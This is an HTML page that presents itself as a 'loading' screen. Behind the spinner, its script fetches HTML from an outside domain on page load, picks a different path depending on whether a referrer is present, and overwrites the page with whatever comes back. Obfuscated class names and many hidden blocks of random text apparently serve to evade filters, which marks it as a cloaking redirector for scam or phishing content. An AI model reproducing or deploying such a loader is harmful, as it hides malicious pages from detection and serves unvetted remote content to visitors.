<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GsnZ5e1n {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GsnZ5e1n .gBJ65hY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GsnZ5e1n .content {
            line-height: 50px;
            text-align: center
        }

        .GsnZ5e1n .img {
            width: 100%
        }

        .GsnZ5e1n .Y40z8RZRnzh {
            text-align: center
        }

        .GsnZ5e1n .Y40z8RZRnzh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GsnZ5e1n .Y40z8RZRnzh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GsnZ5e1n .Y40z8RZRnzh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GsnZ5e1n .Y40z8RZRnzh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GsnZ5e1n .Y40z8RZRnzh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GsnZ5e1n .Y40z8RZRnzh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GsnZ5e1n .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ArglCQyB1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BFzmCRn = ArglCQyB1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BFzmCRn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BFzmCRn +".html?a=share";
		}
		
        W1pbsf=url+"#"+new Date().getTime();
        W1pbsf && function() {
            $.get(W1pbsf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>K1xfkTzjNMkaORCV756CAEevk9U40etTooo3GkFXiHvdREcEXQEQxUbuMcwFL3zB9slpbAhhPqpMxiDgzfJ7fCr1ZluPZ2mfGIGgf</div>
<div style='display:none'>K1xfkTzjNMkaORCV756CAEevk9U40etTooo3GkFXiHvdREcEXQEQxUbuMcwFL3zB9slpbAhhPqpMxiDgzfJ7fCr1ZluPZ2mfGIGgf</div>
<span style='display:none'>SPyB8CwoBsAYYsWrG5d3QLJuMo1tZkNVWmOYPqv9pu27AmMorIPbvo3I715nitvTVCGNJZFjzNXj2c</span>
<b style='display:none' >PwP2aBMZLfJsDXaDCktcb87DW7ukZyqmDlVld16t5V3dWYFfgSq2kqmBKR</b><div class="GsnZ5e1n">
    <div class="gBJ65hY">
        <div class="Y40z8RZRnzh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >TNTvaeYyg9WC33wnEuExN5LcIfiN5HNzApM</ul>
<h1 style='display:none' >HBxyGiphp5kVcr1107o0gsOBxDe</h1>
<span style='display:none'>qXIQP8COoDYvNPVOJI80mLoczUBHHaQvt4KnBR5r0Nir427HUaRKNtxSBMXmHeEKlEFraE10Ucz4IQVHBRObx20SrWiatkp</span>
<p  style='display:none'>CwyR0eveTJB6bUEMIMnBmIeQpdGjx43LPGXFFOurZGOua6paniC2ZfSDOxZOxV</p>
<li style='display:none' >dwC00mqH9zrtlE2fOInIzJ8qY2vMiZZhIiJ9gFEY7KS9tAb1mElUMBYYPhxSr</li>
<b style='display:none' >ABByR9kDxCym7iJ9QLOwcXIvHmitt8vEGKO1c3eCtZSnLAUT6M0rkuaIgljsDjy11WegkKZ</b>
<li style='display:none' >dwC00mqH9zrtlE2fOInIzJ8qY2vMiZZhIiJ9gFEY7KS9tAb1mElUMBYYPhxSr</li>
<li style='display:none' >dwC00mqH9zrtlE2fOInIzJ8qY2vMiZZhIiJ9gFEY7KS9tAb1mElUMBYYPhxSr</li>
<ul style='display:none' >TNTvaeYyg9WC33wnEuExN5LcIfiN5HNzApM</ul></body>
</html>